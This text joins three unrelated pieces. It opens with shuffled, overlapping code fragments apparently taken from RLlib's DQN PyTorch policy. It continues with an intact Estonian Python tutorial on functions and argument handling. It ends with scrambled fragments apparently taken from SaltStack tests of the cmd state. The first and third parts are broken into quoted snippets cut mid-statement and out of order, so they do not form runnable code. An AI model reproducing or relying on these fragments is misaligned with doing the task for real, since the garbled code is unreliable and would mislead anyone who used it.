ModelV2, obs: TensorType, explore, is_training: bool = False):", "q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) policy.q_loss = QLoss( q_t_selected, q_logits_t_selected,", "z * (v_max - v_min) / float(num_atoms - 1) #", "policy.q_model, train_batch[SampleBatch.CUR_OBS], explore=False, is_training=True) # Target Q-network evaluation. 
q_tp1, q_logits_tp1,", "model: ModelV2, obs_batch: TensorType, *, explore: bool = True, is_training:", "explore=False, is_training=True) # Q scores for actions which we know", "q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(), config[\"gamma\"], config[\"n_step\"], config[\"num_atoms\"],", "huber_loss, reduce_mean_ignore_inf, softmax_cross_entropy_with_logits) from ray.rllib.utils.typing import TensorType, TrainerConfigDict torch, nn", "ModelCatalog. add_layer_norm = ( isinstance(getattr(policy, \"exploration\", None), ParameterNoise) or config[\"exploration_config\"][\"type\"]", "dim=1) + support_logits_per_action_centered support_prob_per_action = nn.functional.softmax( support_logits_per_action) value = torch.sum(z", "False): config = policy.config model_out, state = model({ SampleBatch.CUR_OBS: obs,", "grad_process_and_td_error_fn(policy: Policy, optimizer: \"torch.optim.Optimizer\", loss: TensorType) -> Dict[str, TensorType]: #", "(ub-b) == (b-lb) == 0. floor_equal_ceil = (ub - lb", "# TODO: better Q stats for dist dqn \"mean_td_error\": torch.mean(self.td_error),", "* (b - lb) ml_delta = torch.sum( l_project * torch.unsqueeze(ml_delta,", "= done_mask input_dict[PRIO_WEIGHTS] = importance_weights # Do forward pass on", "# generically into ModelCatalog. add_layer_norm = ( isinstance(getattr(policy, \"exploration\", None),", "that using this cross entropy loss for # priority is", "done_mask input_dict[PRIO_WEIGHTS] = importance_weights # Do forward pass on loss", "one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS], policy.action_space.n) q_t_selected = torch.sum( torch.where(q_t > FLOAT_MIN,", "TensorType]: return dict({ \"cur_lr\": policy.cur_lr, }, **policy.q_loss.stats) def setup_early_mixins(policy: Policy,", "policy.config model_out, state = model({ SampleBatch.CUR_OBS: obs, \"is_training\": is_training, },", "q_probs_tp1_best = torch.sum( q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) policy.q_loss =", "= q_vals return policy.q_values, TorchCategorical, [] # state-out def build_q_losses(policy:", "# Distributional Q-learning which corresponds to an entropy loss z", "v_min) / float(num_atoms - 1)) lb = torch.floor(b) ub =", "import (TorchCategorical, TorchDistributionWrapper) from ray.rllib.policy.policy import Policy from ray.rllib.policy.sample_batch import", "0. floor_equal_ceil = (ub - lb < 0.5).float() # (batch_size,", "torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1) else: q_tp1_best_one_hot_selection = F.one_hot( torch.argmax(q_tp1, 1), policy.action_space.n)", "support_prob_per_action, dim=-1) logits = support_logits_per_action probs_or_logits = support_prob_per_action else: advantages_mean", "state_score = model.get_state_value(model_out) if policy.config[\"num_atoms\"] > 1: support_logits_per_action_mean = torch.mean(", "(v_max - v_min) / float(num_atoms - 1) # (batch_size, 1)", "torch.unsqueeze(one_hot_selection, -1), 1) # compute estimate of best possible value", "each Dense # generically into ModelCatalog. add_layer_norm = ( isinstance(getattr(policy,", "not for any other models the policy has). policy.target_q_model =", "model.get_q_value_distributions(model_out) if config[\"dueling\"]: state_score = model.get_state_value(model_out) if policy.config[\"num_atoms\"] > 1:", "== (b-lb) == 0. 
floor_equal_ceil = (ub - lb <", "torch.unsqueeze(mu_delta, -1), dim=1) m = ml_delta + mu_delta # Rainbow", "TargetNetworkMixin.__init__(policy, obs_space, action_space, config) # Move target net to device", "input_dict[SampleBatch.REWARDS] = rew_t input_dict[SampleBatch.NEXT_OBS] = obs_tp1 input_dict[SampleBatch.DONES] = done_mask input_dict[PRIO_WEIGHTS]", "infer the last layer size, otherwise fall back to 256", "build_q_model_and_distribution( policy: Policy, obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict) ->", "if isinstance(q_vals, tuple) else q_vals policy.q_values = q_vals return policy.q_values,", "bool = False): config = policy.config model_out, state = model({", "state_score, dim=1) + support_logits_per_action_centered support_prob_per_action = nn.functional.softmax( support_logits_per_action) value =", "q_logits_t, q_probs_t = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.CUR_OBS], explore=False, is_training=True) #", "ray.rllib.agents.dqn.simple_q_torch_policy import TargetNetworkMixin from ray.rllib.models.catalog import ModelCatalog from ray.rllib.models.modelv2 import", "class ComputeTDErrorMixin: def __init__(self): def compute_td_error(obs_t, act_t, rew_t, obs_tp1, done_mask,", "policy.target_q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) # Q scores for actions which", "to be an integer, lb == ub, so pr_j(s', a*)", "+ mu_delta # Rainbow paper claims that using this cross", "- v_min) / float(num_atoms - 1) # (batch_size, 1) *", "evaluation. q_t, q_logits_t, q_probs_t = compute_q_values( policy, policy.q_model, train_batch[SampleBatch.CUR_OBS], explore=False,", "model.get_q_value_distributions(model_out) else: (action_scores, logits, probs_or_logits) = model.get_q_value_distributions(model_out) if config[\"dueling\"]: state_score", "attribute build_q_losses(self, self.model, None, input_dict) return self.q_loss.td_error self.compute_td_error = compute_td_error", "stats for dist dqn \"mean_td_error\": torch.mean(self.td_error), } else: q_tp1_best_masked =", "else: value = action_scores return value, logits, probs_or_logits def grad_process_and_td_error_fn(policy:", "each Dense # generically into ModelCatalog. add_layer_norm=add_layer_norm) policy.q_func_vars = policy.q_model.variables()", "self.compute_td_error = compute_td_error def build_q_model_and_distribution( policy: Policy, obs_space: gym.Space, action_space:", "q_tp1_best = torch.sum( torch.where(q_tp1 > FLOAT_MIN, q_tp1, torch.tensor(0.0, device=policy.device)) *", "the last layer size, otherwise fall back to 256 num_outputs", "ub = torch.ceil(b) # Indispensable judgement which is missed in", "class QLoss: def __init__(self, q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, importance_weights, rewards,", "config[\"hiddens\"]: # try to infer the last layer size, otherwise", "ml_delta = torch.sum( l_project * torch.unsqueeze(ml_delta, -1), dim=1) mu_delta =", "is_training=True) # Q scores for actions which we know were", "Rainbow paper claims that using this cross entropy loss for", "Do forward pass on loss to update td error attribute", "config: TrainerConfigDict) -> Tuple[ModelV2, TorchDistributionWrapper]: if not isinstance(action_space, gym.spaces.Discrete): raise", "LayerNorm after each Dense # generically into ModelCatalog. 
add_layer_norm =", "= compute_q_values( policy, policy.target_q_model, train_batch[SampleBatch.NEXT_OBS], explore=False, is_training=True) # Q scores", "from ray.rllib.models.catalog import ModelCatalog from ray.rllib.models.modelv2 import ModelV2 from ray.rllib.models.torch.torch_action_dist", "num_atoms) = (batch_size, num_atoms) r_tau = torch.unsqueeze( rewards, -1) +", "* q_tp1_best # compute RHS of bellman equation q_t_selected_target =", "Policy, obs_space: gym.Space, action_space: gym.Space, config: TrainerConfigDict) -> Tuple[ModelV2, TorchDistributionWrapper]:", "= policy.target_q_model.variables() return policy.q_model, TorchCategorical def get_distribution_inputs_and_class( policy: Policy, model:", "\"torch.optim.Optimizer\", loss: TensorType) -> Dict[str, TensorType]: # Clip grads if", "(FLOAT_MIN, huber_loss, reduce_mean_ignore_inf, softmax_cross_entropy_with_logits) from ray.rllib.utils.typing import TensorType, TrainerConfigDict torch,", "([256] + config[\"model\"][\"fcnet_hiddens\"])[-1] config[\"model\"][\"no_final_linear\"] = True else: num_outputs = action_space.n", "# Do forward pass on loss to update td error", "from ray.rllib.policy.sample_batch import SampleBatch from ray.rllib.policy.torch_policy import LearningRateSchedule from ray.rllib.policy.torch_policy_template", "DQN.\".format(action_space)) if config[\"hiddens\"]: # try to infer the last layer", "to device (this is done autoatically for the # policy.model,", "loss) def extra_action_out_fn(policy: Policy, input_dict, state_batches, model, action_dist) -> Dict[str,", "# when b happens to be an integer, lb ==", "policy.q_func_vars = policy.q_model.variables() policy.target_q_model = ModelCatalog.get_model_v2( obs_space=obs_space, action_space=action_space, num_outputs=num_outputs, model_config=config[\"model\"],", "error (potentially clipped) self.td_error = q_t_selected - q_t_selected_target.detach() self.loss =", "support_logits_per_action - torch.unsqueeze( support_logits_per_action_mean, dim=1)) support_logits_per_action = torch.unsqueeze( state_score, dim=1)", "} class ComputeTDErrorMixin: def __init__(self): def compute_td_error(obs_t, act_t, rew_t, obs_tp1,", "ray.rllib.policy.policy import Policy from ray.rllib.policy.sample_batch import SampleBatch from ray.rllib.policy.torch_policy import", "policy.q_loss = QLoss( q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best, train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS], train_batch[SampleBatch.DONES].float(),", "at t + 1 if config[\"double_q\"]: q_tp1_using_online_net, q_logits_tp1_using_online_net, \\ q_dist_tp1_using_online_net", "config: TrainerConfigDict) -> None: LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"]) def after_init(policy: Policy,", "ray.rllib.agents.dqn.dqn_tf_policy import ( PRIO_WEIGHTS, Q_SCOPE, Q_TARGET_SCOPE, postprocess_nstep_and_prio) from ray.rllib.agents.dqn.dqn_torch_model import", "= model.get_q_value_distributions(model_out) else: (action_scores, logits, probs_or_logits) = model.get_q_value_distributions(model_out) if config[\"dueling\"]:", "framework=\"torch\", model_interface=DQNTorchModel, name=Q_SCOPE, q_hiddens=config[\"hiddens\"], dueling=config[\"dueling\"], num_atoms=config[\"num_atoms\"], use_noisy=config[\"noisy\"], v_min=config[\"v_min\"], v_max=config[\"v_max\"], sigma0=config[\"sigma0\"],", "advantages_centered else: value = action_scores return value, logits, probs_or_logits def", "done_mask, gamma=0.99, n_step=1, num_atoms=1, v_min=-10.0, v_max=10.0): if 
class ComputeTDErrorMixin:
    def __init__(self):
        def compute_td_error(obs_t, act_t, rew_t, obs_tp1, done_mask,
                             importance_weights):
            input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t})
            input_dict[SampleBatch.ACTIONS] = act_t
            input_dict[SampleBatch.REWARDS] = rew_t
            input_dict[SampleBatch.NEXT_OBS] = obs_tp1
            input_dict[SampleBatch.DONES] = done_mask
            input_dict[PRIO_WEIGHTS] = importance_weights

            # Do forward pass on loss to update td error attribute
            build_q_losses(self, self.model, None, input_dict)

            return self.q_loss.td_error

        self.compute_td_error = compute_td_error


def build_q_model_and_distribution(
        policy: Policy, obs_space: gym.Space, action_space: gym.Space,
        config: TrainerConfigDict) -> Tuple[ModelV2, TorchDistributionWrapper]:
    if not isinstance(action_space, gym.spaces.Discrete):
        raise UnsupportedSpaceException(
            "Action space {} is not supported for DQN.".format(action_space))

    if config["hiddens"]:
        # try to infer the last layer size, otherwise fall back to 256
        num_outputs = ([256] + config["model"]["fcnet_hiddens"])[-1]
        config["model"]["no_final_linear"] = True
    else:
        num_outputs = action_space.n

    # TODO(sven): Move option to add LayerNorm after each Dense
    #  generically into ModelCatalog.
    add_layer_norm = (
        isinstance(getattr(policy, "exploration", None), ParameterNoise)
        or config["exploration_config"]["type"] == "ParameterNoise")

    policy.q_model = ModelCatalog.get_model_v2(
        obs_space=obs_space,
        action_space=action_space,
        num_outputs=num_outputs,
        model_config=config["model"],
        framework="torch",
        model_interface=DQNTorchModel,
        name=Q_SCOPE,
        q_hiddens=config["hiddens"],
        dueling=config["dueling"],
        num_atoms=config["num_atoms"],
        use_noisy=config["noisy"],
        v_min=config["v_min"],
        v_max=config["v_max"],
        sigma0=config["sigma0"],
        add_layer_norm=add_layer_norm)

    policy.q_func_vars = policy.q_model.variables()

    policy.target_q_model = ModelCatalog.get_model_v2(
        obs_space=obs_space,
        action_space=action_space,
        num_outputs=num_outputs,
        model_config=config["model"],
        framework="torch",
        model_interface=DQNTorchModel,
        name=Q_TARGET_SCOPE,
        q_hiddens=config["hiddens"],
        dueling=config["dueling"],
        num_atoms=config["num_atoms"],
        use_noisy=config["noisy"],
        v_min=config["v_min"],
        v_max=config["v_max"],
        sigma0=config["sigma0"],
        add_layer_norm=add_layer_norm)

    policy.target_q_func_vars = policy.target_q_model.variables()

    return policy.q_model, TorchCategorical


def get_distribution_inputs_and_class(
        policy: Policy,
        model: ModelV2,
        obs_batch: TensorType,
        *,
        explore: bool = True,
        is_training: bool = False,
        **kwargs) -> Tuple[TensorType, type, List[TensorType]]:
    q_vals = compute_q_values(policy, model, obs_batch, explore, is_training)
    q_vals = q_vals[0] if isinstance(q_vals, tuple) else q_vals

    policy.q_values = q_vals
    return policy.q_values, TorchCategorical, []  # state-out


def build_q_losses(policy: Policy, model, _,
                   train_batch: SampleBatch) -> TensorType:
    config = policy.config
    # Q-network evaluation.
    q_t, q_logits_t, q_probs_t = compute_q_values(
        policy,
        policy.q_model,
        train_batch[SampleBatch.CUR_OBS],
        explore=False,
        is_training=True)

    # Target Q-network evaluation.
    q_tp1, q_logits_tp1, q_probs_tp1 = compute_q_values(
        policy,
        policy.target_q_model,
        train_batch[SampleBatch.NEXT_OBS],
        explore=False,
        is_training=True)

    # Q scores for actions which we know were selected in the given state.
    one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS],
                                  policy.action_space.n)
    q_t_selected = torch.sum(
        torch.where(q_t > FLOAT_MIN, q_t,
                    torch.tensor(0.0, device=policy.device)) *
        one_hot_selection, 1)
    q_logits_t_selected = torch.sum(
        q_logits_t * torch.unsqueeze(one_hot_selection, -1), 1)

    # compute estimate of best possible value starting from state at t + 1
    if config["double_q"]:
        q_tp1_using_online_net, q_logits_tp1_using_online_net, \
            q_dist_tp1_using_online_net = compute_q_values(
                policy,
                policy.q_model,
                train_batch[SampleBatch.NEXT_OBS],
                explore=False,
                is_training=True)
        q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net, 1)
        q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net,
                                                 policy.action_space.n)
        q_tp1_best = torch.sum(
            torch.where(q_tp1 > FLOAT_MIN, q_tp1,
                        torch.tensor(0.0, device=policy.device)) *
            q_tp1_best_one_hot_selection, 1)
        q_probs_tp1_best = torch.sum(
            q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1),
            1)
    else:
        q_tp1_best_one_hot_selection = F.one_hot(
            torch.argmax(q_tp1, 1), policy.action_space.n)
        q_tp1_best = torch.sum(
            torch.where(q_tp1 > FLOAT_MIN, q_tp1,
                        torch.tensor(0.0, device=policy.device)) *
            q_tp1_best_one_hot_selection, 1)
        q_probs_tp1_best = torch.sum(
            q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1),
            1)

    policy.q_loss = QLoss(
        q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best,
        train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS],
        train_batch[SampleBatch.DONES].float(), config["gamma"],
        config["n_step"], config["num_atoms"], config["v_min"],
        config["v_max"])

    return policy.q_loss.loss


def adam_optimizer(policy: Policy,
                   config: TrainerConfigDict) -> "torch.optim.Optimizer":
    return torch.optim.Adam(
        policy.q_func_vars, lr=policy.cur_lr, eps=config["adam_epsilon"])


def build_q_stats(policy: Policy, batch) -> Dict[str, TensorType]:
    return dict({
        "cur_lr": policy.cur_lr,
    }, **policy.q_loss.stats)


def setup_early_mixins(policy: Policy, obs_space, action_space,
                       config: TrainerConfigDict) -> None:
    LearningRateSchedule.__init__(policy, config["lr"], config["lr_schedule"])


def after_init(policy: Policy, obs_space: gym.Space, action_space: gym.Space,
               config: TrainerConfigDict) -> None:
    ComputeTDErrorMixin.__init__(policy)
    TargetNetworkMixin.__init__(policy, obs_space, action_space, config)
    # Move target net to device (this is done automatically for the
    # policy.model, but not for any other models the policy owns).
    policy.target_q_model = policy.target_q_model.to(policy.device)


def compute_q_values(policy: Policy,
                     model: ModelV2,
                     obs: TensorType,
                     explore,
                     is_training: bool = False):
    config = policy.config

    model_out, state = model({
        SampleBatch.CUR_OBS: obs,
        "is_training": is_training,
    }, [], None)

    if config["num_atoms"] > 1:
        (action_scores, z, support_logits_per_action, logits,
         probs_or_logits) = model.get_q_value_distributions(model_out)
    else:
        (action_scores, logits,
         probs_or_logits) = model.get_q_value_distributions(model_out)

    if config["dueling"]:
        state_score = model.get_state_value(model_out)
        if config["num_atoms"] > 1:
            support_logits_per_action_mean = torch.mean(
                support_logits_per_action, dim=1)
            support_logits_per_action_centered = (
                support_logits_per_action - torch.unsqueeze(
                    support_logits_per_action_mean, dim=1))
            support_logits_per_action = torch.unsqueeze(
                state_score, dim=1) + support_logits_per_action_centered
            support_prob_per_action = nn.functional.softmax(
                support_logits_per_action)
            value = torch.sum(z * support_prob_per_action, dim=-1)
            logits = support_logits_per_action
            probs_or_logits = support_prob_per_action
        else:
            advantages_mean = reduce_mean_ignore_inf(action_scores, 1)
            advantages_centered = action_scores - torch.unsqueeze(
                advantages_mean, 1)
            value = state_score + advantages_centered
    else:
        value = action_scores

    return value, logits, probs_or_logits


def grad_process_and_td_error_fn(policy: Policy,
                                 optimizer: "torch.optim.Optimizer",
                                 loss: TensorType) -> Dict[str, TensorType]:
    # Clip grads if configured.
    return apply_grad_clipping(policy, optimizer, loss)


def extra_action_out_fn(policy: Policy, input_dict, state_batches, model,
                        action_dist) -> Dict[str, TensorType]:
    return {"q_values": policy.q_values}


DQNTorchPolicy = build_torch_policy(
    name="DQNTorchPolicy",
    loss_fn=build_q_losses,
    get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG,
    make_model_and_action_dist=build_q_model_and_distribution,
    action_distribution_fn=get_distribution_inputs_and_class,
    stats_fn=build_q_stats,
    postprocess_fn=postprocess_nstep_and_prio,
    optimizer_fn=adam_optimizer,
    extra_grad_process_fn=grad_process_and_td_error_fn,
    extra_learn_fetches_fn=lambda policy: {"td_error": policy.q_loss.td_error},
    extra_action_out_fn=extra_action_out_fn,
    before_init=setup_early_mixins,
    after_init=after_init,
    mixins=[
        TargetNetworkMixin,
        ComputeTDErrorMixin,
        LearningRateSchedule,
    ])
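if __name__ == "__main__":
    # Example usage sketch (ours, not part of the original file): the policy
    # class built above is normally consumed through DQNTrainer rather than
    # instantiated directly. "framework": "torch" selects this policy, and
    # num_atoms > 1 switches QLoss onto its distributional branch; the config
    # values below are illustrative only.
    import ray
    from ray.rllib.agents.dqn import DQNTrainer

    ray.init()
    trainer = DQNTrainer(
        env="CartPole-v0",
        config={"framework": "torch", "num_atoms": 51, "num_workers": 0})
    print(trainer.train()["episode_reward_mean"])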
<reponame>priidupaomets/python_kursus<gh_stars>1-10
"""
funktsioonid.py

Using functions and procedures
"""

#
# Procedure
#
def minu_funktsioon():
    print("This is a procedure")

# Call the function
minu_funktsioon()

#
# Function
#
def liida(num1, num2):
    return num1 + num2

sum = liida(3, 5)
print(sum)

# An example of using default values
# def funk(arg1 = väärtus1, arg2 = väärtus2)
#     pass

def funk(arg1 = 0, arg2 = "Test"):
    print(arg1, arg2)

funk()   # Call the function without passing any arguments

#
# Finding prime numbers
#
def isprime(n):
    if n <= 1:
        return False
    for i in range(2, n):
        if n % i == 0:
            return False
    else:
        return True

# Call the function to test it
n = 5
if isprime(n):
    print(f"{n} IS a prime")   # Use an f-string, which lets us put the variable straight into the string
else:
    print(f"{n} is NOT a prime")

def list_primes(max_num = 100):
    for n in range(2, max_num):
        if isprime(n):
            print(n, end = ' ', flush = True)
    print()

list_primes()

#
# Functions with a variable number of arguments
#

# Simply add new arguments
def summa(num1, num2, num3):
    return num1 + num2 + num3

print(summa(1, 2, 3))   # Works
#print(summa(1, 2))     # We'd get an error, since the new function requires 3 arguments

# Let's try function overloading (function overloading or method overloading)
def summa(num1, num2):
    return num1 + num2

def summa(num1, num2, num3):
    return num1 + num2 + num3

#print(summa(1, 2))   # We'd get an error, since the last def overwrites the previous one
print(summa(1, 2, 3))

# Let's try functions with default values
def summa(num1, num2, num3 = 0, num4 = 0):
    return num1 + num2 + num3 + num4

print(summa(1, 2))
print(summa(1, 2, 3))
print(summa(1, 2, 3, 4))
#print(summa(1, 2, 3, 4, 5))   # To make this work we have to change the function

def keskmine(num1, num2, num3 = 0, num4 = 0):
    sum = num1 + num2 + num3 + num4   # Same as summa(num1, num2, num3, num4)
    argumente = 4.0
    return sum / argumente

print(keskmine(1, 2))         # Obviously a wrong result (0.75 instead of 1.5)
print(keskmine(1, 2, 3))      # Also a wrong result (1.5 instead of 2)
print(keskmine(1, 2, 3, 4))   # Correct result

# Improve how we count the arguments
def keskmine(num1, num2, num3 = 0, num4 = 0):
    sum = num1 + num2 + num3 + num4   # Same as summa(num1, num2, num3, num4)
    argumente = 2.0                   # At least 2
    if num3 > 0:
        argumente = argumente + 1
    if num4 > 0:
        argumente = argumente + 1
    return sum / argumente

print(keskmine(1, 2))         # Correct result
print(keskmine(1, 2, 3))      # Correct result
print(keskmine(1, 2, 3, 4))   # Correct result
print(keskmine(1, 2, 3, 0))   # Wrong result!
print(keskmine(1, 0, 3, 2))   # Correct result!?!
# How is that one correct - does the result depend on the order of the arguments?

# Use a different default value
def keskmine(num1, num2, num3 = None, num4 = None):
    sum = num1 + num2   # We can't add up all 4 args right away
    argumente = 2.0     # At least 2
    if num3 is not None:
        argumente += 1
        sum = sum + num3
    if num4 is not None:
        argumente += 1
        sum = sum + num4
    return sum / argumente

print(keskmine(1, 2))         # Correct result
print(keskmine(1, 2, 3))      # Correct result
print(keskmine(1, 2, 3, 4))   # Correct result
print(keskmine(1, 2, 3, 0))   # Correct result!
print(keskmine(1, 0, 3, 2))   # Correct result

# Let's try defining the arguments as a list
def summa(numbrid=[]):
    sum = 0
    for num in numbrid:
        sum += num
    return sum

#print(summa(1))      # Doesn't work, since the argument isn't an iterable type
#print(summa(1, 2))   # Doesn't work, since the arguments aren't a list
arvud=[1, 2]
print(summa(arvud))
arvud=[1, 2, 3]
print(summa(arvud))
arvud=[1, 2, 3, 4]
print(summa(arvud))
print(summa([1, 2, 3, 4, 5]))   # We can also pass the list without an intermediate variable
arvud=[1]
print(summa(arvud))

def summa(*numbrid):
    sum = 0
    for num in numbrid:
        sum += num
    return sum

print(summa())   # Even this variant works
print(summa(1))
print(summa(1, 2))
arvud=[1, 2]
print(summa(*arvud))   # Here, too, we have to use '*'
arvud=[1, 2, 3]
print(summa(*arvud))
arvud=[1, 2, 3, 4]
print(summa(*arvud))
arvud=[1, 2, 3, 4, 5]
print(summa(*arvud))
arvud=[1]
print(summa(*arvud))

# Different kinds of arguments
def argfun(arg1, arg2, *args, kw1 = 1, kw2 = "True"):
    print(arg1, arg2, *args, kw1, kw2)

argfun(1, 2, 3, 4, 5, kw1 = 10, kw2 = 12)

def argfun(**kwargs):
    for (arg, val) in kwargs.items():
        print(f"{arg}={val}", end = ' ')
    print()

argfun(kw2 = 10, kw3 = 12, kw4 = 14)

def argfun(arg1, arg2, *args, kw1 = 1, kw2 = "True", **kwargs):
    print(arg1, arg2, *args, kw1, kw2)
    for (arg, val) in kwargs.items():
        print(f"{arg}={val}", end = ' ')
    print()

argfun(1, 2, 3, 4, 5, kw2 = 10, kw3 = 12, kw4 = 14)

def argfun(arg1, arg2, *args, **kwargs):
    print(arg1, arg2, *args)
    for (arg, val) in kwargs.items():
        print(f"{arg}={val}", end = ' ')
    print()

argfun(1, 2, 3, 4, 5, kw2 = 10, kw3 = 12, kw4 = 14)
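# A possible next step (our sketch, not part of the original course file):
# *args and **kwargs also let a wrapper pass every argument through to
# another function unchanged, whatever the caller supplied. The wrapper name
# logiv_argfun is ours.
def logiv_argfun(*args, **kwargs):
    print("call:", args, kwargs)   # log the raw arguments...
    argfun(*args, **kwargs)        # ...then forward them to argfun above

logiv_argfun(1, 2, 3, kw5 = "test")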
# How can we guarantee that the arguments are numbers?
def numsum(*numbrid):
    sum = 0
    for num in numbrid:
        if isinstance(num, int) or isinstance(num, float):
            sum += num
    return sum

def numcount(*numbrid):
    count = 0
    for num in numbrid:
        if isinstance(num, int) or isinstance(num, float):
            count += 1
    return count

def numavg(*numbrid):
    sum = numsum(*numbrid)
    count = numcount(*numbrid)
    return sum / (count * 1.0)   # We can turn the divisor into a float

print(numsum(1))
print(numsum(1, 2))
print(numsum(1, 2, 3))
print(numsum(1, 2, 3, "4"))
print(numsum(1, None, 3, 4, 5))
print("-"*30)
print(numcount(1))
print(numcount(1, 2))
print(numcount(1, 2, 3))
print(numcount(1, 2, 3, "4"))
print(numcount(1, None, 3, 4, 5))
print("-"*30)
print(numavg(1))
print(numavg(1, 2))
print(numavg(1, 2, 3))
print(numavg(1, 2, 3, "4"))
print(numavg(1, None, 3, 4, 5))
#print(numavg())   # Error! Division by zero!!!

# We'll take a closer look at error handling shortly
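# A possible guard (our sketch, not part of the original course file):
# numavg() crashes with a ZeroDivisionError when it receives no numeric
# arguments, as the commented-out call above shows. Until error handling is
# covered, the division can simply be guarded; the name safe_numavg is ours.
def safe_numavg(*numbrid):
    count = numcount(*numbrid)
    if count == 0:
        return None   # nothing to average; raising an exception would also be reasonable
    return numsum(*numbrid) / count

print(safe_numavg())            # None instead of a crash
print(safe_numavg(1, 2, "3"))   # 1.5 - the string is skipped, just like in numavg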
[ "comment here to make sure the comment reads that the", "of run_watch ''' def setUp(self): self.state_name = 'run_watch' state_filename =", "\"hello\"_|-run']['comment'], 'Command \"echo \"hello\"\" run') def test_run_creates_exists(self): ''' test cmd.run", "'cmd_|-echo test > {0}_|-echo test > {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w')", "= tempfile.mkstemp() try: os.close(fd) except OSError as exc: if exc.errno", "self.assertSaltTrueReturn(ret) def test_test_run_simple(self): ''' cmd.run test interface ''' ret =", "tempfile.mkstemp() try: os.close(fd) except OSError as exc: if exc.errno !=", "'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as fb_:", "We must assert against the comment here to make sure", "def setUp(self): self.state_name = 'run_watch' state_filename = self.state_name + '.sls'", "exc: if exc.errno != errno.EBADF: raise exc super(CMDRunRedirectTest, self).setUp() def", "self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 4) def test_run_redirect(self): ''' test cmd.run with shell", "cmd.run: - unless: echo cheese > {1} '''.format(self.test_tmp_path, self.test_file))) ret", "test=True) self.assertSaltNoneReturn(ret) class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state", "the sls files in the test itself, # And some", "salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' {0}: cmd.run: - unless: echo", "!= errno.EBADF: raise exc super(CMDRunRedirectTest, self).setUp() def tearDown(self): for path", "__future__ import absolute_import import errno import os import textwrap import", "test_run_creates_new(self): ''' test cmd.run creates not there ''' os.remove(self.test_file) state_key", "= self.run_state('cmd.run', name='ls', cwd=tempfile.gettempdir(), test=True) self.assertSaltNoneReturn(ret) class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin): '''", "'.sls' self.state_file = os.path.join(TMP_STATE_TREE, state_filename) # Create the testfile and", "watch: - cmd: saltines ''')) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[saltines_key]['result'])", "= 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file) with salt.utils.fopen(self.state_file, 'w') as", "exc super(CMDRunRedirectTest, self).setUp() def tearDown(self): for path in (self.state_file, self.test_tmp_path,", "def test_run_unless(self): ''' test cmd.run unless ''' state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path)", "the comment reads that the # command \"echo \"hello\"\" was", "CMDTest(ModuleCase, SaltReturnAssertsMixin): ''' Validate the cmd state ''' def test_run_simple(self):", "# As some of the tests create the sls files", "def test_test_run_simple(self): ''' cmd.run test interface ''' ret = self.run_state('cmd.run',", "'''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) self.assertEqual(len(ret[state_key]['changes']), 4) def test_run_redirect(self):", "self.test_file = tempfile.mkstemp() try: os.close(fd) except OSError as exc: if", "self.test_tmp_path = tempfile.mkstemp() try: os.close(fd) except OSError as exc: if", "regression testing for. self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo \"hello\"_|-run']['comment'], 'Command \"echo \"hello\"\" run') def", "will pass, but the second will fail. 
This tests the", "test cmd.run with shell redirect ''' state_key = 'cmd_|-echo test", "> {0}: cmd.run '''.format(self.test_file))) ret = self.run_function('state.sls', [self.state_name]) self.assertTrue(ret[state_key]['result']) class", "the last unless # command in the state. If the", "# Import salt libs import salt.utils IS_WINDOWS = salt.utils.is_windows() class", "'cmd_|-saltines_|-echo changed=true_|-run' biscuits_key = 'cmd_|-biscuits_|-echo biscuits_|-wait' with salt.utils.fopen(self.state_file, 'w') as", "test_run_redirect(self): ''' test cmd.run with shell redirect ''' state_key =", "# Create the testfile and release the handle fd, self.test_file", "= 'dir' if IS_WINDOWS else 'ls' ret = self.run_state('cmd.run', name=cmd,", "import TMP_STATE_TREE from tests.support.mixins import SaltReturnAssertsMixin # Import salt libs", "super(CMDRunRedirectTest, self).setUp() def tearDown(self): for path in (self.state_file, self.test_tmp_path, self.test_file):", "= 'run_watch' state_filename = self.state_name + '.sls' self.state_file = os.path.join(TMP_STATE_TREE,", "cmd state of run_watch ''' def setUp(self): self.state_name = 'run_watch'", "def test_run_simple(self): ''' cmd.run ''' cmd = 'dir' if IS_WINDOWS", "with salt.utils.fopen(self.state_file, 'w') as fb_: fb_.write(textwrap.dedent(''' saltines: cmd.run: - name:", "# command in the state. If the comment reads \"unless", "''' def setUp(self): self.state_name = 'run_watch' state_filename = self.state_name +", "self.run_state('cmd.run', name=cmd, 